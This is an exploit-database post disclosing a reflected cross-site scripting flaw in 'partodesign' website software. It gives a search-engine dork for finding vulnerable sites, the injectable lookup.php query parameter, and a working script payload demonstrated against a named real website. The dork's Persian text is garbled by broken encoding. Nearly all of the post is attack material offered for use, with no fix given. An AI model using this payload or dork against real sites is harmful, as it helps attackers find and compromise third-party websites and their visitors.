partodesign Cross-Site Scripting Vulnerabilities
2013-07-17 16:38:09Posted by: irist.ir
#################################
# Iranian Exploit DataBase
# http://exploit.iedb.ir
#################################
# Exploit Title : partodesign Cross-Site Scripting Vulnerabilities
# Author : Iranian Exploit DataBase
# Discovered By : IeDb
# Email : [email protected]
# Home : http://iedb.ir
# Software Link : http://www.partodesign.com/webdesign
# Security Risk : High
# Tested on : Linux
# Dork : intext:"طراØÛ� ساÛ�ت Ù� بÙ�Û�Ù�Ù� سازÛ� تÙ�سط شرکت طراØÛ� پرتÙ�"
#################################
# Exploit :
# http://www.Site.com/lookup.php?q=[Xss]
# Dem0 :
# http://www.ssmt.ir/lookup.php?q="><script>alert(/IeDb.Ir/)</script>
#################################
Fixes
No fixesIn order to submit a new fix you need to be registered.